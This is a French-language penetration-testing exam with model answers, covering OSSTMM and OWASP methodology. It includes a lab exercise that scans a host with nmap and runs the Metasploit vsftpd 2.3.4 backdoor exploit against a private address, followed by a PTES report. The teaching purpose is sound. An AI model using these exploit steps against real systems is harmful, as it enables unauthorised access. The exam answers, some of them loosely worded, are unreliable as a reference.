Direction Régionale RABAT-SALÉ-KENITRA
Intitulé du module : Méthodologies des tests d’intrusions
Théorie: (15 points)
Exercice 1
Question 1
Choisir, la ou les bonnes réponses qui décrivent le mieux une simulation d’attaque de type externe ou interne :
- Tester les filtres de contenu Web et les accès physiques : attaque type …………..interne…………………
- Simuler l’attaque en prétendant être un client connecté à distance : attaque type …………externe…………………..
Question 2
Quels sont les étapes de mise en œuvre d’un test d’intrusion utilisant la méthode OSSTMM ?
Phase I : Réglementaire :
Examen de la posture, Logistique, Vérification de la détection active –
Phase II : Définitions :
Audit de visibilité, Vérification d'accès, Vérification de la confiance, Vérification des contrôles
Phase III : Phase d'information :
Vérification des processus, Vérification de la configuration, Validation de la propriété, Examen de la ségrégation,
Examen de l'exposition, Veille concurrentielle
Phase IV : Phase de test des commandes interactives
Vérification de quarantaine, Audit des privilèges, Validation de la capacité de survie, Examen des alertes et des
journaux
Question 3
Quelle étape est indispensable à faire en premier lors d’un test d’intrusion selon la méthodologie OWASP ?
Donnez deux exemples de cette opération ?
Lors d’un test d’intrusion et selon la méthodologie OWASP, une collecte d’informations est indispensable en
premier.
Plusieurs exemples, on peut en citer deux :
Énumérer les applications sur le serveur Web - Tester la configuration de l'infrastructure réseau
Question 4
Quelle méthodologie de test d’intrusion doit-on utiliser pour l’approche audit dans chacun des cas suivants :
Cas 1 : Le but final est d’établir un document « open source » en utilisant une démarche automatisable afin
de sécuriser les systèmes d’information.
Méthodologie ……………OSSTMM…………………
Cas 2 : fournir les outils permettant d’apporter une amélioration de la sécurité des applications
Méthodologie ………………OWASP……………
Page 1|4
Question 5
Quelle est la différence entre test d'intrusion et test de vulnérabilité ?
Vulnérabilité a pour objectif de déceler des vulnérabilités connues sur des systèmes, tandis qu'un test
d'intrusions a pour objectif de simuler une attaque, par la découverte et l'exploitation de vulnérabilités.
Pratique : ( 25 points )
Exercice 2 ( 17.5 points )
Dans le cadre de tests d’intrusions et de
vulnérabilités. Vous êtes chargé d’exploiter les
vulnérabilités sur un service réseau interne et
mettre en place une contre-mesure de ces
vulnérabilités.
La topologie utilisée dans le test est la
suivante :
Question 1
En premier temps, vous devez scanner le réseau avec l’outil nmap.
Donnez la commande qui permet d’afficher les ports TCP ouverts dans la machine cible (entre 1 et 2000), les
services associés et leurs versions.
……………… sudo nmap -sS -sV -p1-2000 192.168.1.2………………………………………………………………………
Question 2
Une suite de commandes a été exécutée via l’outil Metasploit sur la machine Kali de votre réseau.
2.1 Quelle est la commande utilisée dans le résultat ci-dessous? Expliquez ce résultat:
msf> ………………………….
Matching Modules
===============
#Name Disclosure Date Rank Check
Description
- ---- ---------------------- ------ ------
---------------
0 exploit/unix/ftp/vsftpd_234_backdoor 2017-09-08 excellent No
VSFTPD v2.3.4 Backdoor Command Execution
msf>
la commande utilisée est search vsftpd
le résultat montre qu’une vulnérabilité a été trouvée sur le serveur vsftpd version 2.3.4
Metasploit contient une porte dérobée qui peut éventuellement aider à pirater le service FTP cible.
2.2 Expliquez le résultat de la commande suivante :
msf>use exploit/unix/ftp/vsftpd_234_backdoor
chargez le module dans la console Metasploit (sélectionne l’exploit associé au service VsFTPd 2.3.4)
Page 2|4
2.3 Expliquez le résultat de la commande suivante :
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options
Afficher les options à définir avant l’exploit
Question 3
Quelle commande permet de définir l’adresse IP de la cible ?
msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.2
RHOSTS 192.168.1.2
Question 4
Que fait cette commande: msf exploit(unix/ftp/vsftpd_234_backdoor) >exploit
Cette commande permet d’avoir accès à la machine cible (dans notre cas @IP 192.168.1.2).
Question 5
Quel est le but de créer un shell meterpreter ?
Créer un shell meterpreter permet de mieux contrôler la cible.
Exercice 3 (7.5 points)
Question 1
Quel est l’objectif du tableau de bord dans le rapport de synthèse des vulnérabilités ?
Le tableau de bord facilite aux données et résultats du test d’intrusion, y compris l'étendue des travaux, les tâches
et les jalons, la carte des applications et du réseau et bien plus encore.
Question 2
Soit le tableau de bord d’un test d’intrusion :
Vulnérabilité
Description Recommandations
critique
framework Cette faille permet à l’attaquant l’exécution Appliquez les mises à jour de la
Microsoft .NET 4.7 à distance de code arbitraire via un version obsolète selon les
document ou une application malveillante. instructions du fournisseur.
En utilisant les données décrites dans le tableau de bord ci-dessus et en utilisant les données suivantes :
Société : InfoEngeneerV1
Périmètre : système d’information
Objectif du test d’intrusion : tenter de manipuler système d’information afin d’en vérifier la fiabilité.
Equipe : un expert en cybersécurité
Date d’intervention : 05/11/2022
Rédiger le rapport du test d’intrusions (en utilisant le Template PTES).
Page 3|4
Exemple de Corrigé
La société InfoEngeneerV1 a réalisé un test d’intrusion sur son système d’information. Le système n’est pas encore
utilisé en production et a été testé à cette occasion. L’objectif du test d’intrusion était de donner la possibilité à des
spécialistes en informatique indépendants d’attaquer délibérément le système et de tenter de le manipuler afin
d’en vérifier la fiabilité.
Une faille a été trouvée au niveau de framework Microsoft .NET version 4.7. Elle est évaluée et classée comme étant
critique. Cette version permet à un acteur malveillant d'exécuter à distance un code arbitraire via un document ou
une application malveillante. Les résultats de ce test d’intrusion seront intégrés au développement du système. Le
test d’intrusion a été réalisé avec succès le 5 novembre 2022 par un expert en cybersécurité. La faille a été
confirmée. Aucune attaque n’est parvenue à compromettre l’intégrité du système ou de ses composants ni à s’y
introduire. Une solution consiste à appliquer des correctifs pour cette vulnérabilité.
Page 4|4